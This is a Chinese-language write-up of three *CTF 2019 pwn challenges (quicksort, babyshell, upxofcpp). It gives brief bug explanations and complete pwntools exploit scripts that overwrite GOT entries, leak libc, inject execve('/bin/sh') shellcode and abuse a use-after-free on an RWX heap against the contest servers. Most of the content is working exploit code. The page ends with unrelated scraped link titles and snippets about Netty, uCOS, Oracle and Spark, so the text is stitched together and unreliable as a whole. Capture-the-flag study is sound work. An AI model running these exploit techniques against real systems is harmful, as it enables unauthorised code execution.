*CTF 2019 quicksort、babyshell、upxofcpp
这次参加比赛总共出了三道,有两道队友都先交了,还是tcl,heap_master卡了差不多一天没解决。。。。还是记录一下出的题目吧
quicksort
题目大体流程就是输入要输入的数字数量,然后输入数字,经过一个快速排序输出,然后结束。
漏洞:
gets函数这里存在栈溢出,可以覆盖i,j,ptr,num。
利用思路:
libc泄露:可以修改ptr指向gets_got,并将i和num设置为1,1。这样可以修改free_got的值同时下面会输出gets的地址来泄露libc
步骤:
1.修改free_got为0x8048816同时泄露libc地址
2.修改free_got为system函数并在bss上面构造/bin/sh,把ptr设置为/bin/sh的地址
3.调用free时getshell
exp:
from pwn import *
#p = process('./quicksort',env={'LD_PRELOAD':'./libc.so.6'})
p = remote('34.92.96.238',10000)
#gdb.attach(p)
context.log_level='debug'
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('./libc.so.6')
free_got = 0x804a018
main_addr = 0x8048816
bss_addr = 0x804a03c
p.recvuntil('sort?')
p.sendline('')
p.recvuntil('number:')
payload=str(main_addr)+'a'*0x7+p32(1)+p32(1)+p32(0)+p32(free_got-0x4)
p.sendline(payload)
p.recvuntil('result:')
p.recvline()
gets_addr = int(p.recvline().replace('\n',''))+2**32
print "gets_addr:",hex(gets_addr)
libc.address = gets_addr-libc.symbols['gets']
system_addr = libc.symbols['system']
one_gadget = libc.address+0x3ac62
bin_sh_addr = libc.search('/bin/sh\x00').next()
p.recvuntil('sort?')
p.sendline('')
p.recvuntil('number:')
payload=str(system_addr-2**32).ljust(16,'a')+p32(3)+p32(1)+p32(0)+p32(free_got-0x4)
p.sendline(payload)
p.recvuntil('number:')
payload=str(6845231).ljust(16,'a')+p32(2)+p32(0)+p32(0)+p32(bss_addr+0x4)
p.sendline(payload)
p.recvuntil('number:')
payload=str(1852400175).ljust(16,'a')+p32(1)+p32(0)+p32(0)+p32(bss_addr)
p.sendline(payload)
p.recvuntil('result:')
p.interactive()
babyshell
这题由于偷懒第二天起太晚了。做完已经被提交了
输入shellcode然后会执行,要求是shellcode只能是一个数组里的值。
这题syscall可以调用,rsi本身就是buf地址,所以只需要把rdi改成0,rdx改成length,就可以调用read写buf了,刚好可写的里面有pop rdi,pop rdx
exp:
from pwn import *
import time
#p = process('./shellcode')
#gdb.attach(p)
p = remote('34.92.37.22',10002)
p.recvuntil('plz:')
payload = '''
push 0x0
pop rdi
push 0x73
pop rdx
syscall
'''
p.send(asm(payload,arch='amd64'))
payload2 = '''
mov rax,0x68732f6e69622f
push rax
push rsp
pop rdi
mov rsi,0
mov rdx,0
mov rax,0x3b
syscall
'''
time.sleep(10)
p.send(('\x90'*8+asm(payload2,arch='amd64')))
p.interactive()
#raw_input()
upxofcpp
一个upx加壳后的程序,脱壳后分析:
free存在uaf漏洞,而且free和show函数都存在一个特定地址函数调用
这题一直没想出来,直到队里大佬说加壳的程序中堆是rwx的。
所以这题就很简单了,步骤为:
1.构造堆块让使用show函数的时候调用一个堆地址
2.在该堆地址上面构造shellcode
3.运行shellcode拿到shell
exp:
from pwn import *
#p = process('./upxofcpp')
p = remote('34.92.121.149',10000) context.log_level='debug'
def add(index,size,content):
p.recvuntil('choice:')
p.sendline('')
p.recvuntil('Index:')
p.sendline(str(index))
p.recvuntil('Size:')
p.sendline(str(size))
p.recvuntil('stop:')
p.sendline(content)
def delete(index):
p.recvuntil('choice:')
p.sendline('')
p.recvuntil('index:')
p.sendline(str(index))
def show(index):
p.recvuntil('choice:')
p.sendline('')
p.recvuntil('index:')
p.sendline(str(index))
payload = '''
mov rax,0x68732f6e69622f
push rax
push rsp
pop rdi
mov rsi,0
mov rdx,0
mov rax,0x3b
syscall
'''
print len(asm(payload,arch='amd64'))
payload = asm(payload,arch='amd64')
#print len(payload)
result =''
i = 0
while i<35:
result+=str(struct.unpack('<i',payload[i:i+4])[0])+' '
i+=4
result+='-1'
print result
add(0,0x22,'-1')
add(1,0x12,'1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2095775979 -1')
add(2,0x8,'-1')
#add(1,0x8,'1 2 1156288656 -1')
add(3,0x50,result)
#add(4,0x22,'-1')
#add(3,0x22,'-1')
delete(2)
delete(1)
delete(0)
#gdb.attach(p)
#delete(3)
show(0)
p.interactive()
*CTF 2019 quicksort、babyshell、upxofcpp的更多相关文章
- 2019年Python、Golang、Java、C++如何选择?
前言 作为开发者我们都知道,开发后台语言可选择的方向会很多,比如,Java,go,Python,C/C++,PHP,NodeJs….等很多,这么多语言都有什么样的优势?如果让你学习一门后端语言,又该如 ...
- EOJ Monthly 2019.2 题解(B、D、F)
EOJ Monthly 2019.2 题解(B.D.F) 官方题解:https://acm.ecnu.edu.cn/blog/entry/320/ B. 解题 单测试点时限: 2.0 秒 内存限制: ...
- 2019年猪年颁奖典礼、公司年会、跨年晚会、科技会议、年终答谢会之幕布背景展板PSD模板-第三部分
16套--2019年猪年颁奖典礼.公司年会.跨年晚会.科技会议.年终答谢会之幕布.背景和展板PSD模板,免费颁奖典礼PSD展板背景幕布,下载地址:百度网盘,https://pan.baidu.com/ ...
- “全栈2019”Java第十四章:二进制、八进制、十六进制
难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...
- “全栈2019”Java第三十九章:构造函数、构造方法、构造器
难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...
- “全栈2019”Java第二十章:按位与、按位或、异或、反码、位运算
难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...
- 2019 ICCV、CVPR、ICLR之视频预测读书笔记
2019 ICCV.CVPR.ICLR之视频预测读书笔记 作者 | 文永亮 学校 | 哈尔滨工业大学(深圳) 研究方向 | 视频预测.时空序列预测 ICCV 2019 CVP github地址:htt ...
- 数值分析案例:Newton插值预测2019城市(Asian)温度、Crout求解城市等温性的因素系数
数值分析案例:Newton插值预测2019城市(Asian)温度.Crout求解城市等温性的因素系数 文章目录 数值分析案例:Newton插值预测2019城市(Asian)温度.Crout求解城市等温 ...
- 2019年第十届蓝桥杯【C++省赛B组】D、E、G、H、I题解
这场有几道题目思路,在之前比赛中遇到过 D. 数的分解 #枚举 题意 将\(2019\)分解成\(3\)个各不相同的正整数之和,并且每个正整数都不包含数字\(2\)和\(4\),一共有多少种分解方法? ...
随机推荐
- app开发中的经常遇到的问题
1.banner不显示: 原因:配置文件中的 域名写错了. img_path = https://www.beicaiduo.com/znbsite/static/tinymce/upload/ 解决 ...
- 通信传输利器Netty(Net is DotNetty)介绍
(先埋怨一下微软大大)我们做NET开发,十分羡慕JAVA上能有NETTY, SPRING, STRUTS, DUBBO等等优秀框架,而我们NET就只有干瞪眼,哎,无赖之前生态圈没做好,恨铁不成钢啊.不 ...
- uCos-II中任务的同步与通信
任务的同步与通信 任务间的同步 在多任务合作工作过程中,操作系统要解决两个问题: 各任务间应该具有一种互斥关系,即对某些共享资源,如果一个任务正在使用,则其他任务只能等待,等到该任务释放资源后,等待任 ...
- Python——安居客租房信息爬取(以南昌为例)
前言: 提前安装好所需要的库. 本代码的输入仅需要某个城市的租房地址首页即可,其他自会生成. 使用前请创建所需的目录,或者为代码添加os.makedir() 支持断点重爬,重行运行即可. header ...
- Oracle 11g 服务启动/关闭 及 DB dump 导入
本地启动Oracle 服务脚本 由于本地机子安装了Oracle后,会自动启动一些默认的Oracle服务,这样子会导致机子比较慢.所以需要改成手动启动/关闭服务. 即用即开,不用就关. 开启的脚本: O ...
- 自编译Apache Spark2.3.3支持CDH5.16.1
1 下载源代码文件 https://archive.apache.org/dist/spark/spark-2.3.3/ 2 解压后导入编辑器,修改依赖的Hadoop版本,下面截图是修改后的,要看自己 ...
- sonar6.7.2启动报错
sonar6.7.2启动报错:错误信息如下: es.log java.lang.RuntimeException: can not run elasticsearch as rootsonar.log ...
- Java读取一个文本文件拼接成一个字符串(readFileToString)
import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.I ...
- 微信中音乐播放在ios不能自动播放解决
在微信中,ios手机下面音乐被自动禁掉无法自动播放,我们可以执行触发body上的元素,自动进行播放. //音乐 var x = document.getElementById("myAudi ...
- 阻塞IO,非阻塞IO,IO多路复用模型
#服务端 import socket sk = socket.socket() sk.bind(('127.0.0.1',8080)) sk.listen() while True: conn, ad ...